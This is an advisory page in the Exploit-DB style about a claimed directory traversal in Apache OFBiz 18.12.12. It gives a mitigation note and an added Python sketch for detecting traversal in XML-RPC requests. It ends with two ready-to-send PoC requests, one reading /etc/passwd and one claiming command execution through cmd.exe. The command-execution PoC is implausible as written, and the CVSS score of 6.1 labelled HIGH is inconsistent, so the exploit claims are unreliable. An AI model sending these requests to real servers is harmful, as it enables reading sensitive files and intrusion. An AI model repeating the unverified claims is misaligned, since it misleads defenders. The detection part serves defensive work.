Vendor: OFBiz
By: Abdualhadi Khalifa
CVSS: 6.1 HIGH
CWE: 22 (Directory Traversal)
Product Name: OFBiz
Affected Version From: 18.12.12
Affected Version To: 18.12.12
Patch Exists: NO
Related CWE:
CPE: a:apache:ofbiz
Metasploit:
Other Scripts:
Platforms Tested: Windows
2024

Apache OFBiz 18.12.12 – Directory Traversal

Apache OFBiz versions 18.12.12 and below are vulnerable to directory traversal. An attacker can exploit this vulnerability by sending a crafted XML request to the '/webtools/control/xmlrpc' endpoint, allowing them to access files outside of the web root directory, such as sensitive system files like '/etc/passwd', or to execute commands on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update Apache OFBiz to a version above 18.12.12 and restrict access to the '/webtools/control/xmlrpc' endpoint if not needed.
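
An added detection sketch, not part of the original advisory or of OFBiz itself: it inspects logged requests to '/webtools/control/xmlrpc' and flags XML-RPC parameters that carry traversal sequences, including percent-encoded forms. The function names, the sample requests and the `demo.echo` method name are constructed for illustration, and it assumes request bodies are available to the inspector (for example from a reverse proxy or WAF log).

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

XMLRPC_PATH = "/webtools/control/xmlrpc"  # endpoint named in the advisory
TRAVERSAL = re.compile(r"\.\.[/\\]")      # "../" or "..\" after decoding

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (%2e%2e%2f, %252e ...)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(method, path, body):
    """Return findings for one logged HTTP request; an empty list means clean."""
    target = re.split(r"[?;]", path, maxsplit=1)[0].rstrip("/")
    if method.upper() != "POST" or target != XMLRPC_PATH:
        return []
    if "<!DOCTYPE" in body.upper() or "<!ENTITY" in body.upper():
        return ["DTD or entity declaration in body (left unparsed)"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["malformed XML-RPC body"]
    name = root.findtext("methodName", default="?")
    findings = []
    # Check the text of every element, so nested structs and arrays and
    # untyped <value>text</value> strings are covered as well.
    for element in root.iter():
        text = (element.text or "").strip()
        if text and TRAVERSAL.search(decode_fully(text)):
            findings.append(f"{name}: traversal sequence in <{element.tag}> {text!r}")
    return findings

# Constructed sample requests: the first body is modelled on the page's first PoC.
WRAP = "<methodCall><methodName>{}</methodName><params><param><value>{}</value></param></params></methodCall>"
SAMPLES = [
    ("POST", XMLRPC_PATH, '<?xml version="1.0"?>' + WRAP.format(
        "example.createBlogPost", "<string>../../../../../../etc/passwd</string>")),
    ("POST", XMLRPC_PATH + ";jsessionid=X", WRAP.format("demo.echo", "%252e%252e%255cconf")),
    ("POST", XMLRPC_PATH, WRAP.format("demo.echo", "<string>hello</string>")),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(path, inspect_request(method, path, body) or "clean")
```

A request that reaches this endpoint at all is worth reviewing when the endpoint is supposed to be restricted, so a hit here complements the access restriction rather than replacing it.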

Exploit-DB raw data:

# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: Abdualhadi Khalifa (https://twitter.com/absholi_ly)
# Vendor Homepage: https://ofbiz.apache.org/
# Software Link: https://ofbiz.apache.org/download.html
# Version: below <=18.12.12
# Tested on: Windows 10


PoC:
1-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>

OR

2-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>